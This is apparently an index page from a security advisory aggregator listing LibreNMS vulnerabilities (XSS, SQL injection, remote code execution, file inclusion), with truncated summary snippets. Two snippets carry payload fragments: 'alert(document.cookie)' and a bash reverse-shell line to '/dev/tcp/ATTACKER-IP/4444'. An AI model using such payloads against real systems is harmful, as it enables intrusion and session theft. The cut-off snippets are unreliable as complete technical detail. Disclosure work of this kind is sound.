Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

Security Intel Hub 18+

Curated security advisories, vulnerability analyses, and exploit write-ups — auto-cleaned and translated to English. Updated continuously.

Examples: RCE · SSRF · GHSA · log4j
Filter
Clear filters
High
LibreNMS Remote Code Execution via Binary Path Manipulation (GHSA-pr3g-phhr-h8fh)
GHSA-pr3g-phhr-h8fh · github.com · 2026-04-18
LibreNMS >= 1.48, < 26.3.0
Read more
Medium
LibreNMS 26.2.0 Release: Fixes Multiple Reflected XSS Vulnerabilities
github.com · 2026-02-21
Librenms < 26.2.0
Read more
Medium
LibreNMS Port Group Delete XSS Vulnerability Fix
github.com · 2026-02-21
LibreMS 26.2.0
Read more
High
Librenms Time-Based Blind SQL Injection in address-search.inc.php (CVE-2026-26990)
CVE-2026-26990 · github.com · 2026-02-21
LibreNMS <= 25.12.0
Read more
Medium
LibreNMS Stored XSS Vulnerability (CVE-2026-26992) with PoC
CVE-2026-26992 · github.com · 2026-02-21
LibreNMS 26.2.0-dev.168+7739a1115
Read more
Medium
LibreNMS Stored XSS in Custom OID unit Parameter
CVE-2024-51494 · github.com · 2026-02-21
LibreNMS >= 24.10.0
Read more
High
CVE-2026-26988: SQL Injection in IPv6 Address Search via ajax_table.php
CVE-2026-26988 · github.com · 2026-02-21
LibreNMS < 25.12.0
Read more
High
LibreNMS ajax_output.php Boolean Blind SQL Injection Vulnerability
github.com · 2025-11-19
LibreNMS 25.10.0
Read more
Low
LibreNMS Weak Password Policy Vulnerability (CVE-2025-65014)
CVE-2025-65014 · github.com · 2025-11-19
LibreNMS 25.10.0
Read more
CVSS 3.8
LibreNMS alert-rules XSS Vulnerability (CVE-2021-46712) Analysis and PoC
github.com · 2025-10-17

### Key Information #### Vulnerability Overview - **Vulnerability ID**: ZDI-CAN-28105 - **Vulnerability Type**: Cross-Site Scripting (XSS) - **Affected Product**: LibreNMS alert-rules - **CVSS Score**…

Read more
CVSS 5.5
LibreNMS <=25.6.0 Stored XSS Vulnerability (CVE-2025-5296) Analysis and PoC
github.com · 2025-08-20

### Critical Vulnerability Information #### Vulnerability Type - **Stored Cross-Site Scripting (XSS)** #### Affected Versions - **Affected versions**: alert(document.cookie)`, and filling other fields…

Read more
Premium intel
CVSS 7.5
LibreNMS CVE-2025-54138 Authenticated Remote File Inclusion Vulnerability
github.com · 2025-07-26

### Critical Vulnerability Information #### Vulnerability Overview - **Vulnerability Type**: Authenticated Remote File Inclusion - **Affected Versions**: & /dev/tcp/ATTACKER-IP/4444 0>&1"'); ?> ``` ##…

Read more
CVSS 4.8
Fix XSS in port edit section (#16566)
github.com · 2024-11-17

From this webpage screenshot, the following key vulnerability information can be obtained: 1. **Vulnerability Description**: - **Title**: Fix XSS in port edit section (#16566) - **Description**: - Fix…

Read more
CVSS 4.8
LibreNMS Device Display Name XSS Vulnerability Fix (#16575)
github.com · 2024-11-17

From this webpage screenshot, we can extract the following key information about the vulnerability: 1. **Vulnerability Description**: - **Title**: Fix device display name XSS vulnerabilities (#16575) …

Read more
CVSS 4.8
LibreNMS XSS Vulnerability Fix Analysis: htmlspecialchars applied to device hostname
github.com · 2024-11-17

From this webpage screenshot, we can obtain the following key information about the vulnerability: 1. **Vulnerability Type**: XSS (Cross-Site Scripting). 2. **Vulnerability Location**: In the `device …

Read more
CVSS 4.8
LibreNMS Reflected XSS in wireless.inc.php: Analysis and PoC
github.com · 2024-11-17

From this webpage screenshot, the following key information about the vulnerability can be obtained: 1. **Vulnerability Description**: - **Title**: Reflected XSS ('Cross-site Scripting') in librenms/i…

Read more
CVSS 7.5
LibreNMS Stored XSS in device-dependencies.inc.php
github.com · 2024-10-03

From this webpage screenshot, the following key information about the vulnerability can be obtained: 1. **Vulnerability Description**: - **Name**: Stored XSS ('Cross-site Scripting') in librenms/inclu…

Read more
CVSS 7.5
LibreMS print-alert-transports.php SQL Injection and XSS Vulnerability Analysis
github.com · 2024-10-03

From this webpage screenshot, we can obtain the following key information regarding the vulnerability: 1. **Code File**: The file is named `print-alert-transports.php`, located in the `librenms / incl…

Read more

All articles are auto-cleaned (markdown extraction + LLM noise removal) and translated to English by our offline pipeline. Source URL is always preserved at the bottom of each article.

Want a specific source covered? Email us — we add new feeds weekly.